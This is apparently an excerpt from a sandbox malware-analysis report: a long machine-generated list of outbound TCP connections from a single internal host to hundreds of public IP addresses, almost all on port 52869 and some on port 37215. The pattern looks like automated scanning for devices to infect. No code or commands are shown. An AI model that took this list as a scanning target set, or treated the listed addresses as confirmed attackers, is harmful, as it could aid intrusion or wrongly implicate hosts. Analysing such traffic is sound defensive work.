Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.88.59.39:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.102.186.28:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.132.88.72:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.232.159.39:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.231.93.24:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.59.33.77:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.250.149.77:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.23.161.68:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.121.158.129:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.59.34.200:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.57.196.4:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.71.202.129:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.146.91.169:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.162.247.155:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.109.50.67:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.124.84.180:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.15.241.52:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.6.134.224:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.118.23.9:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.84.252.233:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.172.30.209:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.172.175.171:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.157.107.43:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.37.247.136:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.50.101.238:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.7.156.178:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.206.159.104:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.73.40.193:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.20.227.220:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.169.59.42:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.46.18.17:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.76.30.105:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.179.21.143:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.153.207.119:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.193.160.233:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.238.32.13:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.169.45.90:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.89.171.239:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.165.153.241:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.217.207.39:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.242.188.144:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.15.198.254:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.189.98.47:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.215.74.154:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.211.153.26:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.101.61.227:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.98.235.157:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.194.155.205:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.34.60.86:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.176.61.176:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.16.158.50:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.5.243.58:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.52.96.37:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.40.113.136:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.62.32.224:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.47.45.66:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.77.76.210:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.53.128.84:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.166.18.13:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.79.126.20:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.137.242.142:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.85.245.153:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.41.169.64:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.113.113.59:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.80.155.216:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.184.215.112:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.57.1.64:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.16.244.155:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.189.100.30:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.244.214.119:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.173.196.203:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.13.217.160:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.144.114.165:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.85.157.88:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.182.43.109:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.100.76.104:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.123.109.121:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.203.116.110:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.162.100.155:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.168.224.124:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.199.138.219:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.192.190.205:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.161.185.213:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.171.255.111:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.203.176.198:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.103.23.154:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.110.242.29:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.82.229.197:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.146.226.97:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.26.32.112:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.2.249.60:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.170.168.52:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.100.193.198:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.91.210.121:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.160.141.15:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.202.226.21:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.104.112.101:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.2.141.153:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.238.114.132:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.115.239.36:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.49.250.153:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.58.65.47:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.79.92.118:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.38.112.165:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.224.223.64:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.125.58.90:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.11.161.5:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.196.180.101:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.117.80.156:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.219.47.223:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.218.187.65:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.155.243.60:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.255.245.240:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.35.36.197:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.19.58.193:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.168.29.65:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.192.136.166:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.36.217.108:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.250.224.3:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.144.17.50:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.51.182.34:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.26.69.190:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.12.130.11:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.115.66.43:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.117.184.11:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.96.53.115:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.33.152.38:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.57.208.243:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.54.242.29:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.16.205.106:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.74.254.114:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.99.216.126:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.4.103.111:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.131.255.152:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.118.252.224:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.96.1.193:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.43.99.40:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.56.75.84:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.234.46.127:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.252.70.206:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.119.36.190:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.3.71.53:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.171.198.11:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.192.134.60:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.16.179.128:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.97.227.139:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.49.10.9:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.82.201.104:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.89.31.186:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.187.140.102:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.235.198.39:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.187.89.91:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.74.208.162:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.252.137.62:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.241.204.90:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.57.127.10:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.1.59.38:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.211.128.4:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.142.159.141:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.17.132.100:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.63.125.81:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.49.226.242:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.242.25.162:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.137.236.122:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.43.113.219:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.195.39.14:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.249.99.105:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.63.135.186:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.138.41.246:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.84.52.201:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.122.99.5:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.6.113.141:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.89.41.185:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.111.38.230:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.187.97.43:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.180.45.48:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.169.206.96:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.95.236.48:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.71.49.212:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.220.190.115:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.43.222.55:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.130.159.237:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.80.155.205:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.151.144.86:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.220.27.196:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.238.254.154:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.7.87.112:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.88.101.250:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.4.86.112:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.156.171.33:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.231.122.162:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.77.35.220:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.46.224.137:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.110.164.19:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.252.217.223:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.16.91.131:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.242.231.233:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.201.33.5:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.39.116.238:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.17.163.33:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.3.198.185:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.222.121.132:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.152.134.103:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.146.23.148:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.203.188.112:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.177.208.201:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.254.26.71:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.200.124.71:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.207.16.220:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.101.242.181:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.137.87.56:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.141.245.109:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.118.135.224:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.160.156.228:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.26.10.91:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.178.183.232:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.72.186.200:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.60.49.53:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.226.96.173:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.4.219.138:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.97.145.45:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.193.203.128:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.158.69.35:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.36.127.37:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.35.86.125:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.232.242.197:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.64.125.136:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.146.20.96:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.49.226.100:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.113.222.51:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.236.185.118:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.58.81.173:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.84.52.131:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.229.170.9:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.126.154.117:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.81.24.251:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.119.238.69:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.185.189.252:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.76.5.186:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.126.216.35:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.231.141.112:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.205.145.195:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.165.192.108:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.91.18.111:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.84.67.125:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.178.137.123:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.209.84.66:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.7.39.35:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.237.161.145:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.102.237.198:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.27.95.248:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.36.0.29:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.149.147.129:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.180.237.43:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.94.129.128:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.1.3.182:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.85.25.150:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.166.49.184:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.102.212.127:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.232.132.222:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.185.149.172:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.0.49.195:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.80.130.151:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.60.106.163:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.174.211.173:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.150.140.119:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.101.50.97:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.201.213.32:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.8.187.31:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.88.177.238:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.58.142.83:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.52.214.105:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.55.252.161:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.35.44.170:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.223.85.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.201.223.204:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.157.59.202:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.34.40.140:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.229.234.127:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.111.249.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.32.132.155:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.48.155.126:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.46.128.197:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.118.68.150:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.57.9.175:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.24.80.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.95.110.118:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.57.234.12:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.146.193.237:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.253.167.35:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.113.165.101:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.63.195.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.242.68.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.208.177.80:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.60.100.208:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.214.86.33:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.61.118.160:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.113.210.120:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.52.127.16:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.24.12.201:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.103.194.79:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.20.173.223:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.107.223.76:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.184.60.36:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.234.37.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.129.51.8:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.171.8.255:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.94.75.244:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.124.134.148:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.166.55.51:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.240.113.32:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.101.116.255:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.149.170.112:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.216.120.174:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.85.64.2:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.165.25.25:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.10.231.10:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.250.137.30:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.39.88.99:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.132.135.225:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.102.17.121:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.76.42.120:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.51.156.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.110.194.68:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.99.176.229:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.166.186.76:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.17.112.16:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.220.158.8:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.123.96.10:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.72.163.199:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.167.215.235:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.145.176.215:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.188.211.117:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.200.91.173:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.39.60.240:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.167.136.179:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.209.254.178:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.145.217.136:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.232.232.120:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.167.120.49:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.141.132.240:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.226.122.94:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.156.155.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.176.57.16:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.238.61.196:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.236.131.100:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.216.130.22:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.108.240.185:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.37.148.78:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.180.70.158:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.85.67.142:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.203.59.142:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.68.168.106:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 45.107.175.79:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.20.64.17:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 197.198.89.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.5.68.71:37215
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.76.61.87:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.209.229.226:52869
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.7.184.32:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.105.217.94:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 91.97.123.54:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 156.25.209.115:37215
Source: global traffic	TCP traffic: 192.168.2.23:51831 -> 185.184.139.204:52869
Source: global traffic	TCP traffic: 192.168.2.23:51319 -> 41.99.190.27:37215
